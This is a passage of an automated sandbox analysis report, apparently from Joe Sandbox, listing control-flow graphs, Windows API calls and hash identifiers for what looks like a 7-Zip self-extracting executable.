40ee00-40ee02 1220->1228 1229 40ed3e-40ed50 1220->1229 1230 40ebb1 1221->1230 1222->1230 1246 40ef01-40ef1d 1224->1246 1247 40eeeb-40eeff call 4107a2 1224->1247 1240 40ee06-40ee0b 1228->1240 1251 40ed56-40ed58 1229->1251 1252 40edda-40eddc 1229->1252 1230->1190 1238 40ec33-40ec3a 1234->1238 1239 40edca-40edcf 1234->1239 1248 40ec68-40ec6b 1238->1248 1249 40ec3c-40ec40 1238->1249 1242 40edd1-40edd3 1239->1242 1243 40edd7 1239->1243 1240->1216 1242->1243 1243->1252 1318 40ef1e call 40bb40 1246->1318 1319 40ef1e call 40c5e0 1246->1319 1320 40ef1e call 40e17a 1246->1320 1321 40ef1e call 41297c 1246->1321 1247->1246 1253 40ec71-40ec7f call 40f707 1248->1253 1254 40edf9-40edfe 1248->1254 1249->1248 1257 40ec42-40ec45 1249->1257 1251->1219 1260 40ed5a-40ed5c 1251->1260 1261 40ede4-40ede7 1252->1261 1262 40edde-40ede0 1252->1262 1281 40ec81-40ec87 call 413226 1253->1281 1282 40ec8c-40ec9d call 40e45f 1253->1282 1254->1228 1254->1240 1267 40ec4b-40ec59 call 40f707 1257->1267 1268 40edec-40edf1 1257->1268 1258 40ef21-40ef2b call 40ce5c 1258->1216 1260->1219 1261->1216 1262->1261 1270 40ee13-40ee19 1264->1270 1275 40edae-40edc6 call 4107a2 1265->1275 1267->1282 1285 40ec5b-40ec66 call 413201 1267->1285 1268->1240 1274 40edf3-40edf5 1268->1274 1277 40ee64-40ee8d call 40ce5c * 2 1270->1277 1278 40ee1b-40ee27 call 40e558 1270->1278 1274->1254 1290 40edc8 1275->1290 1277->1195 1277->1202 1296 40ee35-40ee41 call 40e5a3 1278->1296 1297 40ee29-40ee33 1278->1297 1281->1282 1298 40eca5-40ecaa 1282->1298 1299 40ec9f-40eca1 1282->1299 1285->1282 1290->1270 1311 40ef30-40ef45 call 40ce5c * 2 1296->1311 1312 40ee47 1296->1312 1303 40ee4a-40ee62 call 4107a2 1297->1303 1300 40ecb2-40ecb7 1298->1300 1301 40ecac-40ecae 1298->1301 1299->1298 1306 40ecb9-40ecbb 1300->1306 1307 40ecbf-40ecc8 1300->1307 1301->1300 1303->1277 1303->1278 1306->1307 1307->1214 1307->1215 1311->1216 1312->1303 1318->1258 1319->1258 1320->1258 1321->1258
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@
                                                                                          • String ID: DmA${D@
                                                                                          • API String ID: 1033339047-1777112864
                                                                                          • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                                          • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                                          • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                                          • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1322 410ccb-410ce8 call 40e0d0 1325 410e20-410e23 1322->1325 1326 410cee-410cf5 call 41076b 1322->1326 1329 410cf7-410cf9 1326->1329 1330 410cfe-410d2d call 40e036 memcpy 1326->1330 1329->1325 1333 410d30-410d38 1330->1333 1334 410d50-410d68 1333->1334 1335 410d3a-410d48 1333->1335 1341 410d6a-410d6f 1334->1341 1342 410dcf 1334->1342 1336 410dc4-410dcd ??3@YAXPAX@Z 1335->1336 1337 410d4a 1335->1337 1339 410e1e-410e1f 1336->1339 1337->1334 1338 410d4c-410d4e 1337->1338 1338->1334 1338->1336 1339->1325 1344 410d71-410d79 1341->1344 1345 410dd4-410dd7 1341->1345 1343 410dd1-410dd2 1342->1343 1346 410e17-410e1c ??3@YAXPAX@Z 1343->1346 1347 410d7b 1344->1347 1348 410dad-410dbf memmove 1344->1348 1345->1343 1346->1339 1349 410d8a-410d8e 1347->1349 1348->1333 1350 410d90-410d92 1349->1350 1351 410d82-410d84 1349->1351 1350->1348 1353 410d94-410d9d call 41076b 1350->1353 1351->1348 1352 410d86-410d87 1351->1352 1352->1349 1356 410dd9-410e0f memcpy call 40d041 1353->1356 1357 410d9f-410dab 1353->1357 1359 410e12-410e15 1356->1359 1357->1348 1358 410d7d-410d80 1357->1358 1358->1349 1359->1346
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                                          • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@memcpymemmove
                                                                                          • String ID:
                                                                                          • API String ID: 3549172513-0
                                                                                          • Opcode ID: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                                          • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                                          • Opcode Fuzzy Hash: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                                          • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1374 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1393 404989-40499d SHGetSpecialFolderPathW 1374->1393 1394 404a32-404a36 1393->1394 1395 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1393->1395 1394->1393 1396 404a3c-404a40 1394->1396 1406 4049f2-4049f8 1395->1406 1407 404a22-404a28 1406->1407 1408 4049fa-404a1d call 401370 * 2 call 4032d9 1406->1408 1407->1406 1410 404a2a-404a2d call 40269a 1407->1410 1408->1407 1410->1394
                                                                                          APIs
                                                                                          • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                                            • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                                            • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                                            • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                                            • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                                            • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                                            • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                                            • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                                            • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                                            • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00AA9848,00404926), ref: 0040224B
                                                                                            • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00AA9848), ref: 0040225B
                                                                                            • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                                            • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                                            • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                                            • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                                            • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                                            • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                                            • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00AA9848,00000002), ref: 00402334
                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                                          • wsprintfW.USER32 ref: 004049B0
                                                                                            • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                          • String ID: 7zSfxFolder%02d
                                                                                          • API String ID: 3387708999-2820892521
                                                                                          • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                                          • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                                          • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                                          • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1416 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1420 402c3d-402c59 call 40d00d 1416->1420 1422 402d29 1420->1422 1423 402c5f-402c64 1420->1423 1424 402d2b-402d2f 1422->1424 1423->1422 1425 402c6a-402c74 1423->1425 1426 402c77-402c7c 1425->1426 1427 402cbb-402cc0 1426->1427 1428 402c7e-402c83 1426->1428 1429 402ce5-402d09 memmove 1427->1429 1431 402cc2-402cd5 memcmp 1427->1431 1428->1429 1430 402c85-402c98 memcmp 1428->1430 1436 402d18-402d23 1429->1436 1437 402d0b-402d12 1429->1437 1432 402d25-402d27 1430->1432 1433 402c9e-402ca8 1430->1433 1434 402cb5-402cb9 1431->1434 1435 402cd7-402ce3 1431->1435 1432->1424 1433->1422 1438 402caa-402cb0 call 40292b 1433->1438 1434->1426 1435->1426 1436->1424 1437->1436 1439 402c3a 1437->1439 1438->1434 1439->1420
                                                                                          APIs
                                                                                          • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                                          • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                                          • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                                          • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                                          • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlenmemcmp$memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3251180759-0
                                                                                          • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                                          • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                                          • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                                          • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1443 402dd6-402df1 call 401458 1446 402df7-402df8 1443->1446 1447 402ecd-402ee5 call 4013a9 ??3@YAXPAX@Z 1443->1447 1448 402dfb-402dff 1446->1448 1450 402eb3-402ebf call 401526 1448->1450 1451 402e05-402e0d 1448->1451 1459 402ec0-402ec6 1450->1459 1454 402e75-402e7d 1451->1454 1455 402e0f-402e18 call 401c46 1451->1455 1454->1450 1457 402e7f-402e8b call 401c46 1454->1457 1455->1454 1464 402e1a-402e73 call 40283b call 401458 call 402ad8 call 4013a9 ??3@YAXPAX@Z call 401429 ??3@YAXPAX@Z * 2 1455->1464 1457->1450 1466 402e8d-402e99 call 401c46 1457->1466 1459->1448 1462 402ecc 1459->1462 1462->1447 1464->1459 1466->1450 1471 402e9b-402eb1 call 401526 1466->1471 1471->1459
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                                            • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1731127917-0
                                                                                          • Opcode ID: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                                          • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                                          • Opcode Fuzzy Hash: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                                          • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1481 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1488 401669 call 40851f 1481->1488 1489 40166e-401689 WaitForSingleObject 1481->1489 1488->1489 1491 40168b-40168e 1489->1491 1492 4016bd-4016c3 1489->1492 1495 401690-401693 1491->1495 1496 4016b1 1491->1496 1493 401721 1492->1493 1494 4016c5-4016da GetExitCodeThread 1492->1494 1502 401726-401729 1493->1502 1497 4016e4-4016ef 1494->1497 1498 4016dc-4016de 1494->1498 1499 401695-401698 1495->1499 1500 4016ad-4016af 1495->1500 1501 4016b3-4016bb call 408dbf 1496->1501 1504 4016f1-4016f2 1497->1504 1505 4016f7-401700 1497->1505 1498->1497 1503 4016e0-4016e2 1498->1503 1506 4016a9-4016ab 1499->1506 1507 40169a-40169d 1499->1507 1500->1501 1501->1493 1503->1502 1509 4016f4-4016f5 1504->1509 1510 401702-401709 1505->1510 1511 40170b-401717 SetLastError 1505->1511 1506->1501 1512 4016a4-4016a7 1507->1512 1513 40169f-4016a2 1507->1513 1515 401719-40171e call 408dbf 1509->1515 1510->1493 1510->1511 1511->1515 1512->1509 1513->1493 1513->1512 1515->1493
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                                          • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                                            • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                                            • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                                            • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                                            • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                                            • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                                            • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                                            • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                                            • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                                            • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                                            • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                                            • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 359084233-0
                                                                                          • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                                          • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                                          • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                                          • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                                                          • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                                                          • wsprintfW.USER32 ref: 004045BB
                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: PathTemp$AttributesFilewsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1746483863-0
                                                                                          • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                                          • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                                                          • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                                          • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94
                                                                                          APIs
                                                                                            • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$ExceptionThrow
                                                                                          • String ID: (nA
                                                                                          • API String ID: 2803161813-867891557
                                                                                          • Opcode ID: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                                          • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                                                          • Opcode Fuzzy Hash: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                                          • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                                                          APIs
                                                                                          • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                                                          • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocExceptionStringThrow
                                                                                          • String ID: PlA
                                                                                          • API String ID: 3773818493-1533977103
                                                                                          • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                                          • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                                                          • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                                          • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                                                          APIs
                                                                                            • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                                            • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                                            • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1642057587-0
                                                                                          • Opcode ID: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                                          • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                                                          • Opcode Fuzzy Hash: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                                          • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002B,0000002B,?,00406616,?,00419810,00419810), ref: 00401739
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                                                            • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                                            • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                                            • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
